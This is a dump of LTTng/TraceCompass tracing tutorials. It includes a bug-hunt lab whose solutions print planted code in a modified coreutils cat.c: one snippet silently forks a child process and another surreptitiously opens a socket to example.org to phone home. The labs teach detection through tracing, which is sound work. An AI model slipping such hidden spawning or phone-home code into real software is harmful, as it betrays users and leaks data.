https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/201-lttng-userspace-tracing/screenshots/configureSymbolsRootDirectory.png -------------------------------------------------------------------------------- /labs/201-lttng-userspace-tracing/screenshots/entryExitEvents.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/201-lttng-userspace-tracing/screenshots/entryExitEvents.png -------------------------------------------------------------------------------- /labs/201-lttng-userspace-tracing/screenshots/flameChart.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/201-lttng-userspace-tracing/screenshots/flameChart.png -------------------------------------------------------------------------------- /labs/201-lttng-userspace-tracing/screenshots/flameGraph.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/201-lttng-userspace-tracing/screenshots/flameGraph.png -------------------------------------------------------------------------------- /labs/201-lttng-userspace-tracing/screenshots/functionDurationDistribution.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/201-lttng-userspace-tracing/screenshots/functionDurationDistribution.png -------------------------------------------------------------------------------- /labs/201-lttng-userspace-tracing/screenshots/functionDurationStatistics.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/201-lttng-userspace-tracing/screenshots/functionDurationStatistics.png -------------------------------------------------------------------------------- /labs/201-lttng-userspace-tracing/screenshots/incubatorFlameViews.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/201-lttng-userspace-tracing/screenshots/incubatorFlameViews.png -------------------------------------------------------------------------------- /labs/201-lttng-userspace-tracing/screenshots/openKernelUstExperiment.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/201-lttng-userspace-tracing/screenshots/openKernelUstExperiment.png -------------------------------------------------------------------------------- /labs/201-lttng-userspace-tracing/screenshots/statedumpBinInfo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/201-lttng-userspace-tracing/screenshots/statedumpBinInfo.png -------------------------------------------------------------------------------- /labs/201-lttng-userspace-tracing/screenshots/ustKernelConfigureSymbols.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/201-lttng-userspace-tracing/screenshots/ustKernelConfigureSymbols.png -------------------------------------------------------------------------------- /labs/201-lttng-userspace-tracing/screenshots/ustKernelCriticalPath.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/201-lttng-userspace-tracing/screenshots/ustKernelCriticalPath.png -------------------------------------------------------------------------------- /labs/201-lttng-userspace-tracing/screenshots/ustKernelFlameChart.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/201-lttng-userspace-tracing/screenshots/ustKernelFlameChart.png -------------------------------------------------------------------------------- /labs/201-lttng-userspace-tracing/screenshots/ustKernelFlameGraph.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/201-lttng-userspace-tracing/screenshots/ustKernelFlameGraph.png -------------------------------------------------------------------------------- /labs/201-lttng-userspace-tracing/screenshots/ustKernelFollowThread.png: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/201-lttng-userspace-tracing/screenshots/ustKernelFollowThread.png -------------------------------------------------------------------------------- /labs/201-lttng-userspace-tracing/screenshots/ustMemoryPotentialLeaks.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/201-lttng-userspace-tracing/screenshots/ustMemoryPotentialLeaks.png -------------------------------------------------------------------------------- /labs/201-lttng-userspace-tracing/screenshots/ustMemoryUsage.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/201-lttng-userspace-tracing/screenshots/ustMemoryUsage.png -------------------------------------------------------------------------------- /labs/202-bug-hunt/BugHuntResults.md: -------------------------------------------------------------------------------- 1 | ### Solutions to the Bug Hunt 2 | 3 | The `cat` file had 4 more or less obvious problems/issues. This is a teaching use case, meant to show some potential issues in a very simple program. "Real" issues will be a lot harder to find in a much more complex code base, but the tools are the same. 4 | 5 | - - - 6 | 7 | #### Bug #1: Memory leak 8 | 9 | As mentioned in a previous lab, TraceCompass does not claim to be a memory leak finder. `Valgrind` would do a better job in this case and pinpoint the exact line of the leaked memory allocation. But we can observe the leak in TraceCompass and see where/when in the execution it may have happened. 10 | 11 | ![Bug Hunt Memory Leak](screenshots/memoryLeak.png "Bug Hunt: Memory Leak") 12 | 13 | This happens in the `cat.c` file at line 769: 14 | 15 | ```c 16 | 769 test = malloc(1000); 17 | 770 printf("That's a custom-compiled cat for tutorial purposes %s", test); 18 | 771 inbuf = xmalloc (insize + 1 + page_size - 1); 19 | 772 test = inbuf; // Losing my pointer 20 | ``` 21 | 22 | - - - 23 | 24 | #### Bug #2: An "optimization loop" of usleep 25 | 26 | When developing, it's often convenient to add some latency in some places to avoid a race condition or make sure some other condition is met. The techniques used are sometimes... dubious... One of them is adding sleeps in the code. We can see those with TraceCompass: the critical path shows a `Timer` state for them while the thread is blocked. 27 | 28 | ![Bug Hunt Optimization Loop](screenshots/optimizationLoop.png "Bug Hunt: Optimization Loop") 29 | 30 | This happens in the `cat.c` file in the `next_line_num` function at line 175: 31 | 32 | ```c 33 | 132 static void 34 | 133 next_line_num (void) 35 | 134 { 36 | .... 37 | 174 // Optimization loop, remove when we need more perf ;-) 38 | 175 usleep(100); 39 | 176 } 40 | ``` 41 | 42 | - - - 43 | 44 | #### Bug #3: Spawning a process! 45 | 46 | Most complex applications today are multi-threaded, so we expect to see a lot of children of a given process. But could one of those children be a malicious one? TraceCompass shows the full hierarchy of processes and threads, so if in doubt, it is possible to examine one in particular and see what it does. 47 | 48 | In our case, `cat` is not expected to have any children, but it does, and more than one.
49 | 50 | * Some are named `cat-ust`. Looking at their critical path, we see that they interact with `lttng-consumerd`. Since we are explicitly tracing `cat` with `lttng-ust`, this behaviour is normal in this case. Everything happens before the call to `main`, so it is the preloading of the `lttng` libraries. 51 | 52 | * We also observe a `sleep` process being spawned during execution, in the middle of a call to the `next_line_num` function. That is not normal. `sleep` is harmless here, but a malicious application could start a key logger process, for instance. 53 | 54 | ![Bug Hunt Spawn Process](screenshots/spawnProcess.png "Bug Hunt: Spawn Process") 55 | 56 | This happens in the `cat.c` file in the `next_line_num` function from line 136 to 158: 57 | 58 | ```c 59 | 136 if ((endp - line_num_start) == 2 && execDone == 0) { 60 | 137 // This file looks long enough, let's subrepticiously start a thread hehehe 61 | 138 pid_t process = fork(); 62 | 139 63 | 140 if (process < 0){ 64 | 141 //fork error, oops, just be quiet... 65 | 142 } 66 | 143 if (process == 0){ 67 | 144 char cmd_exec[11] = "/bin/sleep"; 68 | 145 char time_sec[2] = "5"; 69 | 146 char* argv[2]; 70 | 147 71 | 148 argv[0] = cmd_exec; 72 | 149 argv[1] = time_sec; 73 | 150 74 | 151 execv("/bin/sleep", (char *[]){ cmd_exec, time_sec, NULL }); 75 | 152 fprintf(stderr, "\n********************\n"); 76 | 153 fprintf(stderr, " Unable to exec %s: %d\n", argv[0], errno); 77 | 154 fprintf(stderr, "********************\n"); 78 | 155 exit(1); 79 | 156 } 80 | 157 execDone = 1; 81 | 158 } 82 | ``` 83 | 84 | - - - 85 | 86 | #### Bug #4: Surreptitious Phone Home 87 | 88 | Computer systems, from smart phones to data centers, store a lot of very sensitive or personal data that can be of interest to many attackers. It may be tempting for some attackers to add some code snippets to leak this precious data. With TraceCompass and the critical path, we can observe network connections and messaging. Of course, the implementation here is naive. If I were to write such code, I'd make sure it is not as obvious as this one, but... not all attackers are smart or know about this? 89 | 90 | Here, we do not expect `cat` to make any network connections, unless we are catting a file from the network, which we aren't. So those network connections are fishy.
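If you want to corroborate this finding outside of TraceCompass, one option is to list the network-related system calls recorded in the experiment's kernel trace. This is only a sketch: it assumes the trace was recorded as in Task 1 of this lab (so it sits in a `cat-k-u-(*)` directory) and that `babeltrace2` is installed.

```bash
# Dump the kernel events of the experiment and keep only the entries of
# network-related syscalls; a plain `cat` of a local file should produce none.
babeltrace2 cat-k-u-*/ | grep -E 'syscall_entry_(socket|connect|sendto|sendmsg):'
```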
91 | 92 | ![Bug Hunt Phone Home](screenshots/phoneHome.png "Bug Hunt: Phone Home") 93 | 94 | This happens in the `cat.c` file in the `cat` function from line 513 to 533: 95 | 96 | ```c 97 | 513 if (bpin + 5 < eob && *bpin == ' ' && *(bpin + 1) == 'c' && *(bpin + 2) == 'a' && *(bpin + 3) == 't' && *(bpin + 4) == ' ') { 98 | 514 // omg, he said ' cat ', we need to tell the boss 99 | 515 int sockfd = 0,n = 0; 100 | 516 char sendBuff[1024] = "Hey boss, this user said cat, that's not right"; 101 | 517 struct sockaddr_in serv_addr; 102 | 518 103 | 519 if((sockfd = socket(AF_INET, SOCK_STREAM, 0))> 0) 104 | 520 { 105 | 521 serv_addr.sin_family = AF_INET; 106 | 522 serv_addr.sin_port = htons(80); 107 | 523 serv_addr.sin_addr.s_addr = inet_addr("93.184.216.34"); // www.example.org 108 | 524 109 | 525 if(connect(sockfd, (struct sockaddr *)&serv_addr, sizeof(serv_addr))>=0) 110 | 526 { 111 | 527 n = write(sockfd, sendBuff, sizeof(sendBuff)-1); 112 | 528 if (n < 0) { 113 | 529 // Couldn't tell boss, that's too bad 114 | 530 } 115 | 531 } 116 | 532 } 117 | 533 } 118 | ``` 119 | 120 | - - - 121 | 122 | #### Next 123 | 124 | * [Back](../) for more options 125 | -------------------------------------------------------------------------------- /labs/202-bug-hunt/README.md: -------------------------------------------------------------------------------- 1 | ## Bug Hunt 2 | 3 | In this lab, you'll be invited to find issues that have been purposefully introduced in an otherwise quite simple and straightforward program: `cat`. 4 | 5 | *Pre-requisites*: This lab assumes that you are now familiar with kernel and some userspace trace visualization. You should have done the [kernel trace navigation](../101-analyze-system-trace-in-tracecompass), [kernel critical path](../102-tracing-wget-critical-path) and [userspace tracing](../201-lttng-userspace-tracing) labs. 6 | 7 | - - - 8 | 9 | ### Task 1: Set Up and Run the Experiment 10 | 11 | The `files/` directory of this lab contains a file named `cat.c`, which has been modified from coreutils to introduce some issues visible with tracing. **Do not look at the file!** It is small enough that the issues would be obvious. 12 | 13 | First, we'll need to get the coreutils sources so we can add our `cat.c` file to them. If you did the [userspace tracing](../201-lttng-userspace-tracing) lab and compiled coreutils, skip this step: 14 | 15 | ```bash 16 | $ git clone git://git.sv.gnu.org/coreutils 17 | $ cd coreutils 18 | $ ./bootstrap 19 | $ ./configure CFLAGS="-g -O2 -finstrument-functions" 20 | ``` 21 | 22 | Now copy the `cat.c` file to coreutils: 23 | 24 | ``` 25 | $ cp files/cat.c coreutils/src/ 26 | ``` 27 | 28 | And type the `make` command in the coreutils directory. 29 | 30 | ``` 31 | $ make 32 | ``` 33 | 34 | Now, let's trace this new modified `cat` version. We will trace using both kernel and userspace data, to get the full picture. 35 | 36 | ``` 37 | $ lttng-record-trace -p cyg_profile,libc,kernel,memory ./src/cat -n src/cat.c 38 | ``` 39 | 40 | The resulting trace will be in a `cat-k-u-(*)` directory. 41 | 42 | - - - 43 | 44 | ### Task 2: Import in TraceCompass 45 | 46 | To import traces in TraceCompass, you can right-click on your project's `Traces` folder, or click on the *File* menu, and select *Import...*. This will open the import wizard. You must select the directory where the traces are located, that is, the `cat-k-u-(*)` directory. 47 | 48 | Click on the folder's name on the left side to select all traces under that folder.
In the options below, make sure the *Create experiment* option is checked and that an experiment name is entered in the textbox beside it, as shown in the screenshot below. 49 | 50 | ![ImportExperiment](screenshots/importExperiment.png "Trace Compass Import Experiment") 51 | 52 | The traces will be imported. Then expand the *Experiments* folder to see the experiment that was just created with the traces in it. Double-click on the experiment to open it. 53 | 54 | ![OpenExperiment](screenshots/openExperiment.png "Trace Compass Open Experiment") 55 | 56 | - - - 57 | 58 | ### Task 3: Analyze the Trace 59 | 60 | You should now be able to use the notions learned in the previous labs to find the issues with the `cat` process. You can use all the kernel or userspace views available. 61 | 62 | There are 4 separate issues in this example. 63 | 64 | When you think you have found them all, you can look [at the solution](BugHuntResults.md). 65 | -------------------------------------------------------------------------------- /labs/202-bug-hunt/files/cat: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/202-bug-hunt/files/cat -------------------------------------------------------------------------------- /labs/202-bug-hunt/screenshots/importExperiment.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/202-bug-hunt/screenshots/importExperiment.png -------------------------------------------------------------------------------- /labs/202-bug-hunt/screenshots/memoryLeak.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/202-bug-hunt/screenshots/memoryLeak.png -------------------------------------------------------------------------------- /labs/202-bug-hunt/screenshots/openExperiment.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/202-bug-hunt/screenshots/openExperiment.png -------------------------------------------------------------------------------- /labs/202-bug-hunt/screenshots/optimizationLoop.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/202-bug-hunt/screenshots/optimizationLoop.png -------------------------------------------------------------------------------- /labs/202-bug-hunt/screenshots/phoneHome.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/202-bug-hunt/screenshots/phoneHome.png -------------------------------------------------------------------------------- /labs/202-bug-hunt/screenshots/spawnProcess.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/202-bug-hunt/screenshots/spawnProcess.png -------------------------------------------------------------------------------- /labs/203-custom-userspace-instrumentation-in-c/README.md:
-------------------------------------------------------------------------------- 1 | ## Custom Userspace Instrumentation of C/C++ Applications 2 | 3 | In this lab, you will learn how to instrument, compile and trace your own application using LTTng userspace instrumentation. We'll instrument a simple C MPI application doing message passing between MPI workers. 4 | 5 | *Pre-requisites*: Have Trace Compass installed and opened. Have lttng-ust installed, most notably the `liblttng-ust-dev` package. You can follow the [Install LTTng on Ubuntu](../002-install-lttng-on-ubuntu/) lab or read the [LTTng web site](http://lttng.org) for more information. 6 | 7 | *Note*: If you do not want to instrument the application and go straight to the analysis part for custom traces, you can directly go to the [scripted analysis for custom instrumentation](../204-scripted-analysis-for-custom-instrumentation) lab and use the trace provided with this tutorial. 8 | 9 | - - - 10 | 11 | ### Task 1: Understand The MPI Application To Trace 12 | 13 | For this lab, we'll instrument an MPI application, taken from the [MPI tutorial](https://mpitutorial.com/) examples. We'll instrument the `ring` application, in which one MPI worker sends a value to the next and so on until the value comes back to the first worker. The subset of files used for this lab, original and instrumented, is in the [code](code/) directory of this lab. To compile and run it, you'll need the `openmpi` development package (in Ubuntu, `sudo apt-get install mpi-default-dev`). A trace of the application is also available in the trace archive that comes with this tutorial. 14 | 15 | ```bash 16 | $ git clone https://github.com/wesleykendall/mpitutorial.git 17 | $ cd mpitutorial/tutorials/mpi-send-and-receive/code 18 | ``` 19 | 20 | The file to instrument will be the *ring.c* file. For more information on instrumenting applications, you can read the [complete documentation for instrumenting C/C++ applications with LTTng](https://lttng.org/docs/v2.10/#doc-c-application). 21 | 22 | If we look at the [original ring.c](code/ring.orig.c) file, we can identify locations to instrument. We should instrument the following locations: 23 | 24 | * After initialization: that's where we get the ID of the current MPI worker, so we will add the world_rank as a field. 25 | * Before and after reception: We can identify the time spent waiting for a message. After the reception, we'll add the source of the message as a field. 26 | * Before and after sending: To identify when we send the message to another worker. Before the send, we'll add the destination of the message as a field. 27 | 28 | ![OriginalCode](screenshots/originalCode.png "Original code") 29 | 30 | - - - 31 | 32 | ### Task 2: Define The Tracepoint Provider Files 33 | 34 | The first step of the instrumentation is to add the *tracepoint provider header file*, which we will name `ring_tp.h`. This file contains the tracepoint definitions for all the tracepoints we'll insert. That's where we define their names, the fields to add and their types, etc.
35 | 36 | ```C 37 | #undef TRACEPOINT_PROVIDER 38 | #define TRACEPOINT_PROVIDER ring 39 | 40 | #undef TRACEPOINT_INCLUDE 41 | #define TRACEPOINT_INCLUDE "./ring_tp.h" 42 | 43 | #if !defined(_RING_TP_H) || defined(TRACEPOINT_HEADER_MULTI_READ) 44 | #define _RING_TP_H 45 | 46 | #include <lttng/tracepoint.h> 47 | 48 | /* An event */ 49 | TRACEPOINT_EVENT( 50 | /* Tracepoint provider name */ 51 | ring, 52 | /* Tracepoint class name */ 53 | init, 54 | /* Input arguments */ 55 | TP_ARGS( 56 | int, worker_id 57 | ), 58 | /* Output event fields */ 59 | TP_FIELDS( 60 | ctf_integer(int, worker_id, worker_id) 61 | ) 62 | ) 63 | 64 | TRACEPOINT_EVENT( 65 | ring, 66 | recv_exit, 67 | TP_ARGS( 68 | int, worker_id 69 | ), 70 | TP_FIELDS( 71 | ctf_integer(int, source, worker_id) 72 | ) 73 | ) 74 | 75 | TRACEPOINT_EVENT( 76 | ring, 77 | send_entry, 78 | TP_ARGS( 79 | int, worker_id 80 | ), 81 | TP_FIELDS( 82 | ctf_integer(int, dest, worker_id) 83 | ) 84 | ) 85 | 86 | /* The tracepoint class */ 87 | TRACEPOINT_EVENT_CLASS( 88 | /* Tracepoint provider name */ 89 | ring, 90 | /* Tracepoint class name */ 91 | no_field, 92 | /* Input arguments */ 93 | TP_ARGS( 94 | 95 | ), 96 | /* Output event fields */ 97 | TP_FIELDS( 98 | 99 | ) 100 | ) 101 | 102 | /* Trace point instance of the no_field class */ 103 | TRACEPOINT_EVENT_INSTANCE( 104 | ring, 105 | no_field, 106 | recv_entry, 107 | TP_ARGS( 108 | 109 | ) 110 | ) 111 | 112 | TRACEPOINT_EVENT_INSTANCE( 113 | ring, 114 | no_field, 115 | send_exit, 116 | TP_ARGS( 117 | 118 | ) 119 | ) 120 | 121 | #endif /* _RING_TP_H */ 122 | 123 | #include <lttng/tracepoint-event.h> 124 | ``` 125 | 126 | Then we need to create the *tracepoint provider package source file*, which is a C source file that includes the *tracepoint provider header file* described above and is used to expand the tracepoint definition macros. That file will be named `ring_tp.c` and contains the following simple code: 127 | 128 | ```C 129 | #define TRACEPOINT_CREATE_PROBES 130 | 131 | #include "ring_tp.h" 132 | ``` 133 | 134 | Now we are ready to instrument the application itself. 135 | 136 | - - - 137 | 138 | ### Task 3: Instrument The Application 139 | 140 | To instrument the application, you should use the `tracepoint()` macro in the source code, with parameters that match the tracepoint definition. So, to match the `recv_exit` tracepoint described above, the statement `tracepoint(ring, recv_exit, sourceId)` should be inserted. 141 | 142 | But you first need to include the tracepoint definition file and make sure the macros are expanded. The following lines should be added at the beginning of the file. 143 | 144 | ```C 145 | #define TRACEPOINT_DEFINE 146 | #include "ring_tp.h" 147 | ``` 148 | 149 | The code block below shows the diff between the original MPI ring application and the instrumented one, with tracepoints inserted at the locations determined before. The [complete instrumented source file](code/ring.c) is available in the [code directory](code/). 150 | 151 | ```diff 152 | @@ -10,12 +10,16 @@ 153 | #include <stdio.h> 154 | #include <stdlib.h> 155 | 156 | +#define TRACEPOINT_DEFINE 157 | +#include "ring_tp.h" 158 | + 159 | int main(int argc, char** argv) { 160 | // Initialize the MPI environment 161 | MPI_Init(NULL, NULL); 162 | // Find out rank, size 163 | int world_rank; 164 | MPI_Comm_rank(MPI_COMM_WORLD, &world_rank); 165 | + tracepoint(ring, init, world_rank); 166 | int world_size; 167 | MPI_Comm_size(MPI_COMM_WORLD, &world_size); 168 | 169 | @@ -23,22 +27,28 @@ int main(int argc, char** argv) { 170 | // Receive from the lower process and send to the higher process.
Take care 171 | // of the special case when you are the first process to prevent deadlock. 172 | if (world_rank != 0) { 173 | + tracepoint(ring, recv_entry); 174 | MPI_Recv(&token, 1, MPI_INT, world_rank - 1, 0, MPI_COMM_WORLD, 175 | MPI_STATUS_IGNORE); 176 | + tracepoint(ring, recv_exit, world_rank - 1); 177 | printf("Process %d received token %d from process %d\n", world_rank, token, 178 | world_rank - 1); 179 | } else { 180 | // Set the token's value if you are process 0 181 | token = -1; 182 | } 183 | + tracepoint(ring, send_entry, (world_rank + 1) % world_size); 184 | MPI_Send(&token, 1, MPI_INT, (world_rank + 1) % world_size, 0, 185 | MPI_COMM_WORLD); 186 | + tracepoint(ring, send_exit); 187 | // Now process 0 can receive from the last process. This makes sure that at 188 | // least one MPI_Send is initialized before all MPI_Recvs (again, to prevent 189 | // deadlock) 190 | if (world_rank == 0) { 191 | + tracepoint(ring, recv_entry); 192 | MPI_Recv(&token, 1, MPI_INT, world_size - 1, 0, MPI_COMM_WORLD, 193 | MPI_STATUS_IGNORE); 194 | + tracepoint(ring, recv_exit, world_size - 1); 195 | printf("Process %d received token %d from process %d\n", world_rank, token, 196 | world_size - 1); 197 | } 198 | ``` 199 | 200 | - - - 201 | 202 | ### Task 4: Compile The Application 203 | 204 | The next step is to build the application with the tracepoints, using the `lttng-ust` libraries. There are many ways to compile and link an application with tracepoints: tracepoints can be statically linked with the instrumented application, or they can be compiled in a shared object and then linked with the application or preloaded at run time, etc. The LTTng documentation describes an [exhaustive list of compile and link scenarios](https://lttng.org/docs/v2.10/#doc-building-tracepoint-providers-and-user-application) for instrumented applications. 205 | 206 | For this lab, we'll present the simplest one: statically linking the tracepoints with the application. 207 | 208 | We compile the `ring.c` file along with the tracepoint provider package source file, and link them with the `lttng-ust` library. 209 | 210 | ```bash 211 | $ mpicc -o ring -I. ring_tp.c ring.c -llttng-ust -ldl 212 | ``` 213 | 214 | The `ring` application is now instrumented with static LTTng tracepoints. The application can be run as usual and the tracepoints, when not traced, should have near-zero overhead. 215 | 216 | ```bash 217 | $ mpirun -N 4 ./ring 218 | Process 1 received token -1 from process 0 219 | Process 2 received token -1 from process 1 220 | Process 3 received token -1 from process 2 221 | Process 0 received token -1 from process 3 222 | ``` 223 | 224 | The following block shows the difference between the [original simple `makefile`](code/makefile.orig) and the [`makefile` for static linkage](code/makefile) of the tracepoint code. 225 | 226 | ```diff 227 | @@ -4,7 +4,7 @@ MPICC?=mpicc 228 | all: ${EXECS} 229 | 230 | ring: ring.c 231 | - ${MPICC} -o ring ring.c 232 | + ${MPICC} -o ring -I. ring_tp.c ring.c -llttng-ust -ldl 233 | 234 | clean: 235 | rm -f ${EXECS} 236 | ``` 237 | 238 | - - - 239 | 240 | ### Task 5: Trace an Instrumented Application 241 | 242 | To trace an application instrumented with LTTng-UST tracepoints, one simply needs to create a tracing session, enable the userspace events corresponding to the **ring** tracepoint provider, start tracing and run the application. 243 | 244 | Since we are tracing userspace only, we add the `vtid` context to differentiate the running threads.
This context wouldn't be necessary if there was a kernel trace taken at the same time. 245 | 246 | ```bash 247 | $ lttng create 248 | Session auto-20191015-113432 created. 249 | Traces will be output to /home/user/lttng-traces/auto-20191015-113432 250 | $ lttng enable-event -u 'ring:*' 251 | UST event ring:* created in channel channel0 252 | $ lttng add-context -u -t vtid 253 | UST context vtid added to all channels 254 | $ lttng start 255 | Tracing started for session auto-20191015-113432 256 | $ mpirun -N 4 ./ring 257 | Process 1 received token -1 from process 0 258 | Process 2 received token -1 from process 1 259 | Process 3 received token -1 from process 2 260 | Process 0 received token -1 from process 3 261 | $ lttng stop 262 | Waiting for destruction of session "auto-20191015-113432"... 263 | Tracing stopped for session "auto-20191015-113432" 264 | $ lttng view 265 | Trace directory: /home/user/lttng-traces/auto-20191015-113432 266 | 267 | [... trace output] 268 | $ lttng destroy 269 | Session "auto-20191015-113432" destroyed 270 | ``` 271 | 272 | The trace is available in the `/home/user/lttng-traces/auto-20191015-113432` directory, typically in a `ust/uid/<uid>/64-bit` sub-directory. It can now be opened in visualization tools like Trace Compass. 273 | 274 | - - - 275 | 276 | ### Conclusion 277 | 278 | In this lab, you have instrumented and compiled a simple MPI application with LTTng userspace instrumentation. You also obtained a trace from an execution of this application. But the events in the trace are of a type that is not understood by default by trace viewers. They can be counted, and one can manually follow the execution of the application, but hardly any analysis can be done out of the box. In the next lab, we'll see how we can visualize those custom traces. 279 | 280 | - - - 281 | 282 | #### Next 283 | 284 | * [Scripted Analysis For Custom Instrumentation](../204-scripted-analysis-for-custom-instrumentation) to see how we can analyze and observe traces with custom instrumentation 285 | or 286 | * [Back](../) for more options 287 | -------------------------------------------------------------------------------- /labs/203-custom-userspace-instrumentation-in-c/code/makefile: -------------------------------------------------------------------------------- 1 | EXECS=ring 2 | MPICC?=mpicc 3 | 4 | all: ${EXECS} 5 | 6 | ring: ring.c 7 | ${MPICC} -o ring -I. ring_tp.c ring.c -llttng-ust -ldl 8 | 9 | clean: 10 | rm -f ${EXECS} 11 | -------------------------------------------------------------------------------- /labs/203-custom-userspace-instrumentation-in-c/code/makefile.orig: -------------------------------------------------------------------------------- 1 | EXECS=ring 2 | MPICC?=mpicc 3 | 4 | all: ${EXECS} 5 | 6 | ring: ring.c 7 | ${MPICC} -o ring ring.c 8 | 9 | clean: 10 | rm -f ${EXECS} 11 | -------------------------------------------------------------------------------- /labs/203-custom-userspace-instrumentation-in-c/code/ring.c: -------------------------------------------------------------------------------- 1 | // Author: Wes Kendall 2 | // Copyright 2011 www.mpitutorial.com 3 | // This code is provided freely with the tutorials on mpitutorial.com. Feel 4 | // free to modify it for your own use. Any distribution of the code must 5 | // either provide a link to www.mpitutorial.com or keep this header intact. 6 | // 7 | // Example using MPI_Send and MPI_Recv to pass a message around in a ring.
8 | // 9 | #include <mpi.h> 10 | #include <stdio.h> 11 | #include <stdlib.h> 12 | 13 | #define TRACEPOINT_DEFINE 14 | #include "ring_tp.h" 15 | 16 | int main(int argc, char** argv) { 17 | // Initialize the MPI environment 18 | MPI_Init(NULL, NULL); 19 | // Find out rank, size 20 | int world_rank; 21 | MPI_Comm_rank(MPI_COMM_WORLD, &world_rank); 22 | tracepoint(ring, init, world_rank); 23 | int world_size; 24 | MPI_Comm_size(MPI_COMM_WORLD, &world_size); 25 | 26 | int token; 27 | // Receive from the lower process and send to the higher process. Take care 28 | // of the special case when you are the first process to prevent deadlock. 29 | if (world_rank != 0) { 30 | tracepoint(ring, recv_entry); 31 | MPI_Recv(&token, 1, MPI_INT, world_rank - 1, 0, MPI_COMM_WORLD, 32 | MPI_STATUS_IGNORE); 33 | tracepoint(ring, recv_exit, world_rank - 1); 34 | printf("Process %d received token %d from process %d\n", world_rank, token, 35 | world_rank - 1); 36 | } else { 37 | // Set the token's value if you are process 0 38 | token = -1; 39 | } 40 | tracepoint(ring, send_entry, (world_rank + 1) % world_size); 41 | MPI_Send(&token, 1, MPI_INT, (world_rank + 1) % world_size, 0, 42 | MPI_COMM_WORLD); 43 | tracepoint(ring, send_exit); 44 | // Now process 0 can receive from the last process. This makes sure that at 45 | // least one MPI_Send is initialized before all MPI_Recvs (again, to prevent 46 | // deadlock) 47 | if (world_rank == 0) { 48 | tracepoint(ring, recv_entry); 49 | MPI_Recv(&token, 1, MPI_INT, world_size - 1, 0, MPI_COMM_WORLD, 50 | MPI_STATUS_IGNORE); 51 | tracepoint(ring, recv_exit, world_size - 1); 52 | printf("Process %d received token %d from process %d\n", world_rank, token, 53 | world_size - 1); 54 | } 55 | MPI_Finalize(); 56 | } 57 | -------------------------------------------------------------------------------- /labs/203-custom-userspace-instrumentation-in-c/code/ring.orig.c: -------------------------------------------------------------------------------- 1 | // Author: Wes Kendall 2 | // Copyright 2011 www.mpitutorial.com 3 | // This code is provided freely with the tutorials on mpitutorial.com. Feel 4 | // free to modify it for your own use. Any distribution of the code must 5 | // either provide a link to www.mpitutorial.com or keep this header intact. 6 | // 7 | // Example using MPI_Send and MPI_Recv to pass a message around in a ring. 8 | // 9 | #include <mpi.h> 10 | #include <stdio.h> 11 | #include <stdlib.h> 12 | 13 | int main(int argc, char** argv) { 14 | // Initialize the MPI environment 15 | MPI_Init(NULL, NULL); 16 | // Find out rank, size 17 | int world_rank; 18 | MPI_Comm_rank(MPI_COMM_WORLD, &world_rank); 19 | int world_size; 20 | MPI_Comm_size(MPI_COMM_WORLD, &world_size); 21 | 22 | int token; 23 | // Receive from the lower process and send to the higher process. Take care 24 | // of the special case when you are the first process to prevent deadlock. 25 | if (world_rank != 0) { 26 | MPI_Recv(&token, 1, MPI_INT, world_rank - 1, 0, MPI_COMM_WORLD, 27 | MPI_STATUS_IGNORE); 28 | printf("Process %d received token %d from process %d\n", world_rank, token, 29 | world_rank - 1); 30 | } else { 31 | // Set the token's value if you are process 0 32 | token = -1; 33 | } 34 | MPI_Send(&token, 1, MPI_INT, (world_rank + 1) % world_size, 0, 35 | MPI_COMM_WORLD); 36 | // Now process 0 can receive from the last process.
